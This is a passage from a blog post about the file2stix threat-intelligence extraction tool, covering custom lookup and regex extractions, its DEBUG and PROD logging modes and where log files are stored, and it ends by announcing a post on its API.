You can also write your own custom extractions using either exact text matches (lookups) or regular expressions. This is described in the “Lookups vs Regular Expressions” part earlier in this post.
Logging
file2stix has 2 logging modes;
DEBUG
: contains details of user settings entered, all extraction logs, and specific details (e.g. stack traces) of any errors.PROD
: contains details of user settings entered, and all extraction logs (inc, basic error details).
Log files can be found in the root directory ($FILE2STIX_path
) as follows;
$FILE2STIX_path/log/<TIMESTAMP>_<REPORT_ID>.log
Up next: The file2stix API
So far I’ve explained how the backend of file2stix works. This file2stix functionality is exposed to users via an API.
In the next post I will explain the design decisions that went into the API and how it is structured for the expected use-cases.
Discuss this post

Never miss an update
Sign up to receive new articles in your inbox as they published.